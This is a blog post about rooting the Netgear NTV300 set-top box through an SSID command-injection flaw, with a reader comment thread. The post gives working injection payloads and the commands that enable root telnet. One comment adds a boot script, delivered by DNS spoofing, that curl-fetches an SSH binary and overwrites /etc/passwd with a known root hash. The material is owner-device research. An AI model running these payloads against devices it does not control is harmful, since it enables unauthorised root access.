Jailbreaking the NeoTV

Today we’ll be jailbreaking the Netgear NTV300 set top box…with a TV remote.

The Netgear NeoTV 300

Negear’s NeoTV set top boxes are designed to compete with the popular Roku, and can stream video from all the usual sources (Netflix, HuluPlus, Youtube, etc). The NTV300 is one of the least expensive NeoTV models, and while a GPL release is available, it contains only copies of the various standard open source utilities used by the NTV300. All the interesting bits – such as Netflix streaming, or the ability to build a custom firmware image – are not included.

Inside the NTV300 we find a Mediatek ARM SoC, a 128MB NAND flash chip and 256MB of RAM:

Inside the NTV300

The four pin header in the top right corner of the PCB is a serial port (115200 baud 8N1), and while it provides access to the U-Boot boot loader, it does not provide a root shell. After the system boots, it displays copious debug messages and allows for rudimentary control over the NTV300′s user interface (i.e., pressing the right arrow key on the keyboard while in the serial terminal is the same as pressing the right arrow key on the remote control). Various attempts to send BREAK and SIGINT signals have no affect; we’ll have to dig a little deeper into this one.

Luckily, the firmware updates for the NTV300 aren’t encrypted. A binwalk scan of the firmware update image reveals a few firmware headers and two SquashFS images:

DECIMAL         HEX             DESCRIPTION
-------------------------------------------------------------------------------------------------------
63944           0xF9C8          Mediatek bootloader
111840          0x1B4E0         Mediatek bootloader
128133          0x1F485         LZMA compressed data, properties: 0x80, dictionary size: 1073741824 bytes, uncompressed size: 196608 bytes
293660          0x47B1C         JFFS2 filesystem data little endian, JFFS node length: 8195
410769          0x64491         LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
410793          0x644A9         LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
410817          0x644C1         LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
428064          0x68820         uImage header, header size: 64 bytes, header CRC: 0x2023172F, created: Tue Oct 16 04:37:00 2012, image size: 1896744 bytes, Data Address: 0xDA00000, Entry Point: 0xDA00000, data CRC: 0xFD61E493, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name:
429156          0x68C64         LZMA compressed data, properties: 0x87, dictionary size: 250216448 bytes, uncompressed size: 14786800 bytes
445513          0x6CC49         gzip compressed data, from Unix, last modified: Sun Oct 14 23:00:19 2012, max compression
4182784         0x3FD300        Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 76854395 bytes, 905 inodes, blocksize: 131072 bytes, created: Tue Oct 16 23:34:59 2012
30793205        0x1D5DDF5       PNG image, 133 x 133, 8-bit/color RGBA, non-interlaced
70987253        0x43B2DF5       JFFS2 filesystem data little endian, JFFS node length: 102880
72970663        0x45971A7       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73055216        0x45ABBF0       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73172060        0x45C845C       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73261506        0x45DE1C2       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73386095        0x45FC86F       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73436271        0x4608C6F       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
78240759        0x4A9DBF7       PNG image, 780 x 870, 8-bit/color RGBA, non-interlaced
81538240        0x4DC2CC0       Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 17109954 bytes, 326 inodes, blocksize: 131072 bytes, created: Thu Oct  4 01:54:51 2012
98651328        0x5E14CC0       PNG image, 1280 x 720, 8-bit/color RGB, non-interlaced
98675264        0x5E1AA40       PNG image, 720 x 480, 8-bit/color RGB, non-interlaced

While the firmware update does not appear to contain a complete file system, most of the interesting stuff appears to be in the first SquashFS image. The /usr/local/bin/ntv300ui binary is particularly interesting as it is responsible for providing the NTV300′s user interface, including the handling of user input from both the remote control and the serial console.

Although the ntv300ui binary has been stripped, there are plenty of debug printfs that reveal the original function names:

Printf’s reveal original function names

A quick IDAPython script takes care of renaming most of these functions:

import re

funcs = []
regex = re.compile('^[a-zA-Z_]*$')

for xref in XrefsTo(LocByName("printf")):
        ea = xref.frm
        found = False
        real_name = None

        for i in range(0, 10):
                ea -= 4
                if GetMnem(ea) == "LDR":
                        opnd = GetOpnd(ea, 0)
                        if opnd == "R1":
                                r1_string = GetString(LocByName(GetOpnd(ea, 1)[1:]))
                                if r1_string is not None and regex.match(r1_string) and len(r1_string) > 3:
                                        real_name = r1_string
                                else:
                                        real_name = None
                        elif opnd in ["R0", "R2", "R3"]:
                                r3_string = GetString(LocByName(GetOpnd(ea, 1)[1:]))
                                
                                if r3_string is not None and '%s' in r3_string: 
                                        found = True
                                        break
                                else:
                                        found = False
        if found and real_name is not None:
                name = GetFunctionName(xref.frm)
                if name not in funcs:
                        funcs.append(name)
                        print real_name
                        MakeName(LocByName(name), real_name)

print "Renamed %d functions!" % len(funcs)

With functions properly named, reversing can begin in ernest, and the code in ntv300ui isn’t exactly confidence inspiring. It looks like Netgear hired some Unix admins and told them to write an application in C; for example, here is how they re-implemented libc’s stat() function:

How not to stat a file

In fact, system() and popen() are used generously throughout the code. These are particularly interesting:

System calls to iwpriv

Popen calls to iwpriv

System call to wpa_cli

The SSID and encryption key values are used as part of system() and popen() calls. So where do the SSID and network key values come from? You guessed it, the user:

User controlled data!

So what happens if we tell the NTV300 to connect to an SSID named “`reboot`”?

Command injection via SSID

Connecting to `reboot`

Rebooting!

Sweet! Since we are already connected to the serial port, it would be nice if we could spawn a shell for ourselves on the serial terminal. Let’s try:

Connecting to “;/bin/sh #

Shell successfully spawned on the serial terminal

While this provides us with a minimalist shell, it is not very user friendly. There is no command echoing, and a ton of debug output is intermixed with the command output. Let’s see if we can find an easier way to get a shell – preferably one that doesn’t involve taking the device apart.

Examining the file system on the live device, there are plenty of files and directories that were not included in the firmware update file. Checking out some of the start up scripts, we find this juicy piece of code in /root/rc.user:

if [ -f /mnt/ubi_boot/mfg_test/enable ]; then
                echo "[WNC RD] Maufacturing Mode"
                #chmod +x /mnt/ubi_boot/mfg_test/*.sh

                #if [ ! -f /mnt/ubi_boot/mfg_test/disable_app_player ]; then
                #       #(sleep 3; /usr/local/mfg_test/play_power_on.sh) &
                #       /usr/local/mfg_test/play_power_on.sh &
                #fi

                echo "[WNC RD] Set ip forward"
                echo 1 > /proc/sys/net/ipv4/ip_forward

                #chmod +x /mnt/ubi_boot/mfg_test/reset
                /usr/local/mfg_test/reset &

                echo "[WNC RD] Set Ethernet Fixed IP: [192.168.0.100]"
                #ifconfig eth0 192.168.0.100 netmask 255.255.255.0 up
                echo -n 0 > /mnt/ubi_boot/settings/NetworkInterface
                echo -n 1 > /mnt/ubi_boot/settings/IpMode
                echo -n 192.168.0.100 > /mnt/ubi_boot/settings/IpAddress
                echo -n 255.255.255.0 > /mnt/ubi_boot/settings/SubNetMask
                echo -n 0.0.0.0 > /mnt/ubi_boot/settings/Gateway
                echo -n 0.0.0.0 > /mnt/ubi_boot/settings/PrimaryDNS
                echo -n 0.0.0.0 > /mnt/ubi_boot/settings/SecondaryDNS

                sync

                echo "[WNC RD] enable telnetd"
                inetd -d &
                (sleep 5; ifconfig eth0 192.168.0.100 netmask 255.255.255.0 up; ping -c 1 192.168.0.10; ping -c 1 192.168.0.11) &

        else
                echo "[WNC RD] Normal mode"

                # XBMC Server
                if [ -f /usr/local/bin/xbeventd -a -e /mnt/fifo ]; then
                        /usr/local/bin/xbeventd /mnt/fifo &
                fi

                if [ -f /usr/local/bin/xbhttpd ]; then
                        /usr/local/bin/xbhttpd
                fi

                if [ -f /usr/local/bin/xbmdns ]; then
                        /usr/local/bin/xbmdns &
                fi

        fi

It checks to see if the /mnt/ubi_boot/mfg_test/enable file exists, and if so, it fires up a telnet service (among other things). However, the mfg_test directory doesn’t exist at all on the production system:

Directory listing of /mnt/ubi_boot/

But with the SSID command injection vulnerability, we can easily create it. The commands to create the file are too long to fit into the restricted 32-character SSID input field, so we’ll echo them piecemeal into a shell script and then execute that script:

cd /mnt/ubi_boot

mkdir mfg_test

cd mfg_test

echo >> enable

/bin/sh /tmp/a

Finally, we power cycle the box. If successful, the NTV300′s IP address should have been set statically by the /root/rc.user script upon reboot. Let’s check:

Static IP settings

We can now change the DHCP settings back to dynamic, connect the NTV300 to our access point and telnet in (username root, no password):

Root telnet shell

Rooted with nothing but the remote control it came with. That’s all folks.

Bookmark the permalink.

125 Responses to Jailbreaking the NeoTV

  1. No One says:

    Do you know if that’s also true for the other NeoTV models?
    Is it possible to modify the system to make jailbreak permanent?

    I’d like a programmable set top box that can play Hulu & Netflix – this seems to fit the bill. Do you know if I get the NeoTV Max (the one with analog outputs and qwerty remote), will it blend? (that is, jailbreak?)

    • Craig says:

      I have no idea if this affects other NeoTV models. It wouldn’t surprise me if it did (vendors tend to re-use code a lot), but the ntv300ui binary seemed specific to the NTV300 so maybe not.

      The above jailbreak is permanent for the NTV300. The created file persists across reboots and ensures that the telnet server is started on every boot. You could add your own files/binaries to the system and they should remain across a reboot as well. Note that file system modifications do appear to be removed when you reset the device though.

  2. Kenny says:

    I must be missing something here, but why not just run ‘inetd -d &’, maybe with nohup if required.

    • Craig says:

      Well, a two reasons.

      First, I tried that. :) Although inetd would run, for whatever reason, even with the ampersand inetd never returned, so the NeoTV would think that it was permanently stuck trying to “connect” to the AP, and it wouldn’t let me connect to my actual AP in order to telnet in. If you look at the screenshot from when I started the shell on the serial terminal, it prints out a message saying that the shell has no job control, so that might be the culprit. I didn’t really look into it further. You can probably get around this by plugging in a wired connection to the NeoTV’s ethernet jack.

      Second, creating the mfg_test/enable file ensures that the telnet server is started every time the devices boots up, so I don’t have to keep re-running inetd each time I reboot the system.

      • asdafa says:

        Couldn’t you create the file by using the unfriendly shell spawned before?

        • Craig says:

          Technically yes, but it was a very unfriendly shell. Random characters typed into the shell would get dropped (presumably because the ntv300ui application was also reading keystrokes from the serial port) and with no command echoing there was no way to know if that had happened until after you’d typed out your command and hit enter.

          Also, I really wanted a way to do it without having to open the case and connect to the serial port since that would make it easier for others to duplicate if they desired. Plus I really liked the idea of being able to root the box using *only* the remote control. :D

          Ultimately, once you have command injection as root, what you do from there is just details and personal preference. Curl is already installed, so you could just as easily have curl download something from a Web server and execute that for example.

  3. Pingback: Rooting a NeoTV set top box from the couch | Siecurity.com

  4. Pingback: Belgaum news | About Belgaum | Belgaum information | Belgaum district | Belgaum city | Belgaum Hotels | Belgaum People | Belgaum tourism | Belgaum entertainment | Belgaum students | Inside facebook | Hack | make use of | technical news | | Rooting a NeoTV

  5. Pingback: Indagadores |Seguridad informatica |Seguridad en internet » Enraizamiento un decodificador NeoTV parte superior del sofá

  6. Essobi says:

    With just a remote, and full of win. :D

  7. AC says:

    The best idea may be to not buy crap products that are broken by design. The perverted locked-down-control-freak-assholes don’t deserve our money.

    Fuck ‘em.

  8. Pingback: Włamał się do odtwarzacza. Pilotem. Przez nazwę sieci WiFi. | Zaufana Trzecia Strona

  9. doesntmatter says:

    what does one do with a rooted NeoTV?

    • Craig says:

      I dunno, I just like breaking things. :)

      I suppose you’d do whatever it is you’d like to do with a $50 4″x4″ Linux box with wifi, ethernet, 1080p HDMI and a netflix player pre-installed.

  10. Hehe Well done Craig and keep breaking things

  11. Justathought says:

    Instead of doing all that, just get a raspberry pi and install raspbmc…..

    • Craig says:

      Depends on your needs; the main reason I was looking at the NeoTV is because it has Netflix suport, which is something open source alternatives all currently lack. Although I have been meaning to look into the possibility of taking the netflix binaries off the NeoTV and putting them on a raspi.

      • Chris Brunner says:

        Craig, any word on this? Have you tried tinkering with the netflix binary at all?

        • Craig says:

          The netflix binary appears to be heavily tied to the ntv300ui binary – if the ntv300ui process is not running, the netflix binary will just sit there and hang. There are also several DRM files referenced by the netflix binary that are on the system, but not included in the firmware update, so these may be dynamically generated. I haven’t really had time to take a serious look at it, but if you are just trying to get Netflix running on your Linux PC, this is probably a better bet.

  12. Pingback: Security News #0×26- The Frankenstorm Edition « CyberOperations

  13. ozzra says:

    Can’t believe they put a backtick onto an on screen keyboard! :D
    (Apparently not even in confusion with the apostroph, which is present as well) I cannot imagine what an average user would want that for.

  14. Pingback: HR7 – Noname | hard reset – der Technik-Podcast

  15. Pingback: Wordpress Theme Update — Teil 1 | .tuxfrickler

  16. Victor says:

    Most of the functions implemented using system come from Mediatek code, not netgear. So luckily, you can use this jailbreaking method on some other products with Mediatek SoC ;)

  17. Gopi says:

    Hi Craig

    Is there a way to jailbreak NTV200?. Even though it is called Neo tv it uses BCM7615.

    • Craig says:

      I haven’t looked at the NTV200; it’s MIPS based, so it may use a completely different code base than the NTV300. If you have a link for a firmware update I’d be happy to take a look at it.

      • DB says:

        Craig, Here’s the image Thanks for looking

        • Craig says:

          The firmware image is just a tarball, but the extracted parts (kernel, filesystem, etc) appear to be encrypted and signed. I’ll have to take a closer look at it.

      • DB says:

        Craig, Would you also kindly advise how we may go about manually updating the NTV200′s firmware if we have a .fwu image instead of the automatic updates that is done by the NTV200 itself? Thanks a lot! – DB

        • Craig says:

          I don’t think there is an official way to perform manual firmware upgrades. On boot up the devices phone home to see if there are any firmware updates available, and if so, they upgrade themselves. The connections to Netgear’s servers aren’t encrypted though, so you could redirect the DNS lookups to a local server of your own and serve up firmware upgrades from there.

  18. Alexander says:

    Hi Craig! Good article as always.
    I always thought files you create on embedded systems are deleted upon reboots as i thought they reside in RAM. and all permanent files should be flashed by part of filesystem image.
    Could you cover a bit on this topic. What it depends on if new files survive reboot or not.
    Thanks and keep posting.

    • Craig says:

      It depends on the filesystem(s) used by the embedded device. SquashFS and CramFS are read-only, so you can’t write data to them at all. RamFS is obviously writable, but gets blown away on a reboot. Other file systems, like JFFS2, EXT2, and Minix, are full read/write file systems and retain data across a reboot.

      It is not uncommon for devices to use SquashFS/CramFS for the main system files, and have some other directories mounted as JFFS2 so that they can save configuration data there (DD-WRT has separate SquashFS/JFFS2 partitions for example).

  19. David says:

    The backquote trick doesn’t work on the NTV200 :(

  20. Robert Sisson says:

    What can you do with it after rooting it

  21. Ritz says:

    Hi Craig please suggest something for NTV200. I guess lot of folks looking forward to have some solution as most of them got it pretty cheap a week back.
    Excited to hear back from you.

    • Craig says:

      I haven’t had time to take a serious look at it. Current NTV200 firmware updates are encrypted and I don’t have an NTV200 myself. However, Stewart posted a link to an older firmware version above, which is not encrypted, so that will be a good place to start looking. Besides extracting the file system from the firmware though, I haven’t done much with it.

  22. Sam says:

    Very nice article. Do you think there is a way to make a custom firmware update that will allow that box to play video from online websites like http://www.chooseandwatch.com/ or some other website that has link for online TVs?
    If there is a way to modify the box to to play video from Windows Media server? The links are mms:// there are many web sites offering free online tv and this device will be great alternatives for people that want to watch it on their TVs instead of the computer monitors.

  23. h3ck says:

    you wrote “;/bin/sh #

    2 questions

    1. why does not end with a ” ?

    2. why does it end with # ?

    thanks for the reply

    • Craig says:

      It does not end with a ” because it ends with a #. The # is a comment character in the shell, so anything after the # is treated as a comment and ignored.

  24. JimmyDB says:

    @Craig: I have a NeoTV300 and a NeoTV300SL (Max). I tried the reboot command as a test on my NeoTV300 and it did not work; I have not tried on the Max yet. If interested, I can reads/post the firmware version.

    Can you confirm this still works after the latest updates?

    Do I have to have a router with the proper SSID’s?
    I did set one up with reboot as the name, but it still didn’t work. I’m just wondering as it relates to the rest of the commands.

    • Craig says:

      It looks like Netgear has pushed out a new firmware version. I’m downloading it now to take a look.

      Worst case scenario, it looks like tricking the NTV300 into downgrading the firmware should be pretty easy – it calls out to a hard-coded site to look for firmware updates, and none of the traffic is encrypted. Simple DNS spoof should take care of it.

      And no, the SSID’s you specify don’t have to actually exist – at least they didn’t in the firmware version I examined here.

      • Angel says:

        Hi Craig
        How does this DNS spoofing work and how do you do it.
        I just bought one of these boxes hooked it up and it updated the software. what is the step by step for downgrading the software on the neotv.i am not very tech savy but I am willing to learn.

  25. Warner Losh says:

    So how hard would it be to trick it into using an NFS mount instead of a USB drive for its local media?

  26. Warner Losh says:

    Also, if one can read the firmware file systems, can’t one extract them and add/subtract things from them to create your own custom firmware? Possibly with DNS Spoofing to get it to do the right thing and go to a local server?

    • Craig says:

      Yes, but one would have to reverse the format header in order to re-calculate any checksum fields. This also assumes that the firmware isn’t signed; I haven’t seen anything that leads me to believe that it is, but the other NTV models have signed firmware.

  27. Warner Losh says:

    This image is the latest update, and the prior link is now gone… I can’t seem to bring it up without upgrading to this version…

  28. Warner Losh says:

    DECIMAL HEX DESCRIPTION
    -------------------------------------------------------------------------------------------------------
    63944 0xF9C8 Mediatek bootloader
    111840 0x1B4E0 Mediatek bootloader
    128133 0x1F485 LZMA compressed data, properties: 0x80, dictionary size: 1073741824 bytes, uncompressed size: 196608 bytes
    293660 0x47B1C JFFS2 filesystem data little endian, JFFS node length: 8195
    410769 0x64491 LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
    410793 0x644A9 LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
    410817 0x644C1 LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
    428064 0x68820 uImage header, header size: 64 bytes, header CRC: 0x61030CBE, created: Tue Oct 30 04:45:46 2012, image size: 1896992 bytes, Data Address: 0xDA00000, Entry Point: 0xDA00000, data CRC: 0x4F011583, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name:
    429156 0x68C64 LZMA compressed data, properties: 0x87, dictionary size: 250216448 bytes, uncompressed size: 14786800 bytes
    445513 0x6CC49 gzip compressed data, from Unix, last modified: Tue Oct 30 04:44:21 2012, max compression
    4183248 0x3FD4D0 Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 76879771 bytes, 906 inodes, blocksize: 131072 bytes, created: Tue Oct 30 05:28:46 2012
    30794485 0x1D5E2F5 PNG image, 133 x 133, 8-bit/color RGBA, non-interlaced
    46646747 0x2C7C5DB gzip compressed data, ASCII, extra field, has comment, comment, encrypted, last modified: Fri Aug 29 04:32:12 2008
    63725129 0x3CC5E49 JFFS2 filesystem data little endian, JFFS node length: 531211
    70942504 0x43A7F28 JFFS2 filesystem data little endian, JFFS node length: 102880
    72986421 0x459AF35 PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73070974 0x45AF97E PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73187818 0x45CC1EA PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73277264 0x45E1F50 PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73476751 0x4612A8F PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73526927 0x461EE8F PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    78318935 0x4AB0D57 PNG image, 780 x 870, 8-bit/color RGBA, non-interlaced
    81563280 0x4DC8E90 Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 17109954 bytes, 326 inodes, blocksize: 131072 bytes, created: Wed Oct 3 23:54:51 2012
    98676368 0x5E1AE90 PNG image, 1280 x 720, 8-bit/color RGB, non-interlaced
    98700304 0x5E20C10 PNG image, 720 x 480, 8-bit/color RGB, non-interlaced

    Is what binwalk tells us about the 1.00.58NA.bin image.

  29. Warner Losh says:

    (sorry for the large sized-post: I don’t know how to remove it)

  30. Gary says:

    Hey Craig, it looks like .61 is out and this was back from .48. Have you tried this since the new software? I can’t seem to get the “mfg_test/enable” stuff to stick. After a reset it completely dumps the data.

  31. Warner Losh says:

    BTW, with the .58 firmware, I was able to extract the squashfs image by using

    dd if=NTV300B_V1.00.58NA.bin of=fred bs=1 iseek=4183248
    unsquashfs fred

    It looks like there’s usr/etc/sdk_config.conf file there. If this is more than just a reference, it might be a good vector of attack since we should be able to replace the squashfs image with our own (assuming we can figure out any checksums on the entire .bin blob) and have an injection attack to get the box to update itself.

    SDK_CONFIG_FACTORY_TEST_MSG_ENABLE = 0
    SDK_CONFIG_FACTORY_TEST_AUTO_DL_SCRIPT = 0
    SDK_CONFIG_FACTORY_TEST_AUTO_DL_SERVER = http://192.168.0.1/
    SDK_CONFIG_FACTORY_TEST_SCRIPT_FILENAME = factory_test.sh

  32. Warner Losh says:

    Oh, and it looks like the update key is encoded in the binary in an easy to read manner. Sweet

  33. kyle says:

    Im still wondering what the benefits of the jailbreak are….like android you get root access to personalize the phone, and iphone you can tweak your system function….what does this jailbreak do ??? btw i just got this so thats why im curious

  34. Zaid says:

    goodjob .. that s a full of win !
    but my question is , do you have old neotv firmware , the one you did jailbreak on ? new firmwares is unvulnerable and i am planning to downgrade.

  35. Zaid says:

    i have managed to downgrade by spoofing dns, from NTV300SL_V1.0.68 to NTV300SL_V1.0.64 successfully but i want to try to downgrade to 1.0.48N if someone could provide firmware image

    • Craig says:

      I don’t know if it will work for the NTV-300SL, but I have the 1.00.48 firmware for the NTV-300 which you can get here.

      • Zaid says:

        well thanks alot craig ,
        i will see if i can manage to get it work somehow ..
        i have tried to use firmware-mod-kit to extract and rebuild image of NTV300SL without any modification on filesystem , it calculated checksum of header with no problems ,, but it wasn’t an exact match of original .. still thinking if i should try to apply the generated firmware or not.

  36. Zaid says:

    well , i have managed to downgrade to NTV300 on NTV300SL successfully ,, thanks craig for the firmware you provided.

    i might publish a script to do automatic dns spoofing and fileinfo.xml that contains update version.

    thanks alot for your help !

    • Zaid says:

      the exploit worked , now i am thinking of replacing files through telnet with the SL UI to get lost advantges , what do you think craig might it work ?

      • Craig says:

        Awesome! Replacing the files should work as long as they reside on a writable partition whose changes are preserved across a reboot.

  37. Pingback: Downgrading NeoTV to 1.0.48 to do jailbreak !! | RaYMaN4EvA

  38. Pingback: Compile “Hello World” over NeoTV 300 ! | RaYMaN4EvA

  39. Brian says:

    Craig: I apologize in advance for such an off topic question, but I’m getting nowhere on the Netgear forums and you obviously know your stuff.

    I have the base model NTV300 and a recent firmware update added DLNA support which my box isn’t supposed to have. I think it was a mistake and now there is another firmware update pending that I haven’t run because I’m afraid it will “patch out” the new “My Media” channel which includes the DLNA sharing. It also includes the ability to browse USB, which my version doesn’t even have, another reason I think the feature was added in error.

    Any idea how I can find out if the firmware with DLNA support was indeed intended for my box? Or to find out if the newest unapplied firmwmare update will wipe it out?

    Now that I have it I don’t want to lose it. It actually works great … thanks.

    • Craig says:

      One option is to get the latest firmware (a link to the latest firmware image can be found here), find and extract the SquashFS file system using binwalk/firmware-mod-kit, then look to see if there are any executables with the string ‘dlna’ in the name (I’m assuming the dlna binary will have the string ‘dlna’ in it). If so, then the new firmware probably has DLNA support (although it’s no guarantee).

      Since you sound happy with the firmware you have, another option is to trick the NeoTV into thinking that there is no new firmware upgrade. The NeoTV’s check for firmware upgrades by requesting a URL from updates1.netgear.com. You could set up a fake DNS server on your network to black hole this domain name, or your router might support blocking web requests based on domain name or keywords. There is a more detailed write up on the firmware upgrade process on rayman’s blog.

      • Wm Brian Savacool says:

        Thanks for the idea ‘Craig’. I did one better. I setup a local web server and gave my router a static DNS mapping to point ‘updates1.netgear.com’ to to my web server.

        My web server also has the same folder structure as netgear’s. I download an earlier version of the firmware. The lastone that had DLNA for me was 1.0.76NA. I downloaded and modified ‘fileinfo.xml’. I changed the ‘date’ field in the XML file
        to one day higher than what was already there. Also, I only increased the DATE field in the XML file. I change the path to the target file to point to 1.076NA and change the “firmware version string to 1.0.77NA”
        I then had the ntv300b poll for updates. It found one, and installed .. Bam. I now have DLNA back from 1.076NA.

        • Mike Riebesehl says:

          Brian I just picked up a NTV for DNLA streaming but when setting up was forced into updating to 1.0.78NA which like you removed that service. Not an IT expert but think i can set up that same folder structure on my mac. by changing the version number was able to download http://updates1.netgear.com/ntv300b/us/gm/NTV300B_V1.0.76.bin still a bit unclear how to create that xml file and redirect the updater to a local server.
          Thanks for any guidance.
          Mike

          • Mike Riebesehl says:

            I figured out how to enable the website and create directories using apache on my mac but my router does not support redirecting the updates1.netgear.com dns to a local IP any suggestions?
            Thanks you

          • eenofonn says:

            You can install a local bind9 server and use that to do the name redirection. Have you thought about using the USB method below or does your model not have the USB port?

          • Mike Riebesehl says:

            Yeah only the NTV300SL has the usb port that would be an easy solution. Will look into your local bind9 server suggestion. If not then I can still return it and get the SL or a WD Live Media Player
            Thanks eenofonn

          • eenofonn says:

            no problem, glad I could point you in the right direction.

        • Adrian says:

          I am currently on 1.1.12 and when i follow your process, it sees the update on my local server, but when i click update, it doesnt do anything, i am not sure how to find out what its doing without cracking it open and hitting the serial connection. Do you know if this process still works?

      • Arkanoid88 says:

        Rayman’s blog appears to be down. Can anybody share a guide on how to do the upgrade/downgrade?

    • Wm Brian Savacool says:

      Don’t Install the new firmware, I have the base model too, and they take DLNA/ USB away in the next update 1.078.

  40. Brian says:

    Craig:

    Thanks for the detailed reply. I appreciate it.

  41. Christian Rendon says:

    I lost my remote control and I am using my cellphone app to control it (wired internet) . I want to setup my wifi but without the original remote control it is impossible. The wifi menu activates only if the box is unplugged from the wired network. I guess they didn’t think this would happen right. What a poor design. Do you know any way to manually setup wifi using the android app through wired connection?

  42. Rob says:

    I picked up the NTV300SL, (NeoTV Max) yesterday. None of this worked on it, and looking at the SquashFS none of this was present in /root/rc.user on the latest firmware for the device (v1.0.76).

    I managed to get root, though. While sniffing its traffic with wireshark, I noticed it hits a few phone-home URLs on boot. One of these was: http://updates1.netgear.com/ntv300sl/us/gm/web_cmd.sh

    Yes, this apparently does just what you’d expect. I used a local DNS server to point that hostname at a local Linux machine, and then created a /ntv300sl/us/gm/web_cmd.sh script on that server. Lo and behold, it ran it on boot.

    If you’re attempting to do this, I’ll assume you know how to set up the web server and the DNS configuration.

    Here’s the web_cmd.sh:

    cd /tmp
    curl -O http://updates1.netgear.com/ntv300sl/us/gm/dropbear
    chmod 111 dropbear
    ln -s dropbear dropbearkey
    ./dropbearkey -t dss -f dropbear_dss_host_key
    ./dropbearkey -t rsa -f dropbear_rsa_hot_key
    ./dropbear -d dropbear_dss_host_key -r dropbear_rsa_hot_key
    echo “root:vUXETBmux6gC2:0:0:root,,,:/root:/bin/sh” > /etc/passwd

    Grab the armv6l dropbear binary from here: http://landley.net/aboriginal/downloads/binaries/extras/dropbearmulti-armv6l

    Rename it to 'dropbear' and drop it in the directory with web_cmd.sh. Reboot your NTV, wait a bit, and then you should be able to ssh root@ntv.ip.here with a password of "rooted" (set via the crypt hash in web_cmd.sh).

    The init scripts check /mnt/ubi_boot/rc.ntv300 (on this particular device) and execute it if it exists. So, I used this to make the SSH config persistent.


    echo 'cd /mnt/ubi_boot' >/mnt/ubi_boot/rc.ntv300
    echo 'sh dropbear/rc.dropbear' >>/mnt/ubi_boot/rc.ntv300
    mkdir /mnt/ubi_boot/dropbear
    cp /tmp/dropbear /mnt/ubi_boot/dropbear
    cp /tmp/dropbear_dss_host_key /mnt/ubi_boot/dropbear
    cp /tmp/dropbear_rsa_host_key /mnt/ubi_boot/dropbear
    cp /etc/passwd /mnt/ubi_boot/dropbear
    echo 'cd dropbear' > /mnt/ubi_boot/dropbear/rc.dropbear
    echo 'cp passwd /etc' >> /mnt/ubi_boot/dropbear/rc.dropbear
    echo './dropbear -d ./dropbear_dss_host_key -r ./dropbear_rsa_hot_key' >> /mnt/ubi_boot/dropbear/rc.dropbear

    Your SSH configuration should now persist across reboots, and you can remove the temporary DNS and web server hacks, and do your thing. Not sure if this will work on other models, but it may. Enjoy!

    • Zaid says:

      Wow , this one is amazing too ! we don’t even need to downgrade now !
      good job

    • Zaid says:

      Rob .. i got NTV300SL and updated to 1.0.76 , but the script u’ve mentioned was never requested by mine.
      and i tried to listen over serial too to see if it shows up as a debugging , got nothing too ..
      this is totally weired :/

      • Rob says:

        That’s really strange. It only requested it once on boot. While sniffing, can you see it hit any other URLs on that update site?

    • Arkanoid88 says:

      Everything works as advertised on the latest firmware, but when connecting to ssh, the “rooted” password is not recognized anymore. Maybe there was a tweak on /etc/passwd on the latest 1.1.12?

    • Jason says:

      Can’t believe this thing would run a shell script it gets over http *as root* on every boot. What madness!!!

  43. Zaid says:

    Today , i was able to make a custom firmware based on 1.0.76 for NTV300SL ( which was simple process , only modified rootfs squash image ) and it have telnet and thttpd (http server).

    download custrom image from here :

    http://rayman4ever.com/files/ntv/8653_linux_demo_dbg.bin

    to install this image :
    1) get usb flash drive
    2) make a directory on root of flash called “UPG”
    3) copy the file 8653_linux_demo_dbg.bin to UPG ,
    you should have something like this :
    UPG/8653_linux_demo_dbg.bin
    4) plug flash memory into NeoTV
    5) power on NeoTV
    6) It will ask you to update , accept it.
    That’s it :D

    you can telnet to your neotv , and use “rooted” as password for root.
    Netgear did an update over passwd file , and i couldn’t decrypt the root’s password yet .. so i thought i would use Rob’s one ;)

  44. Pingback: NeoTV First Custom firmware | RaYMaN4EvA

  45. Vijay A says:

    I have a quick question for you… I wish to change HDMI Output setting from HDMI Auto to a fixed value which is 720p. Unfortunately Netgear firmware does not have it enabled. Can you please suggest any method of changing it ?
    So far I have downloaded custom firmware from Rayman on my NTV300SL.

    Thanks in advance.

  46. eenofonn says:

    I ended up playing with my neotv all night long last night in a fit of “hacker’s insomnia” as I’m calling it. I’m not exceptionally skilled with embedded linux or arm but I did come up with what I think is a crazy idea last night.

    Is there a way to clone the live system to a file using dd or another tool so that you could use say qemu to emulate the system for more testing/development purposes.

    It would also be nice if there was a wiki/forum where everyone interested in working on this project together could collaborate thought’s ideas etc.

    oh and I’m rooted using the UPG usb exploit :) thanks to Zaid

  47. Deepz says:

    Hi guys .can any of you help me i have mistakenly bought 3 neo tv 300 from the usa.My main goal was to view my slingbox on my tv.I was not aware that neo tv 300 max was required for this neither was i told at the ces show at the slingbox booth ,they only told me to get netgear neotv that is it.Now i got 3 neotv which are uselessly lying .can any of you help me to install the slingbox app in it thats all i want it to do,watch my slingbox.
    Thanks in advance

    • thesavo says:

      I just allowed the 1.0.82 update to run. It has a “SLING” app on the main screen. It prompts your for your Slingbox Cloud account.
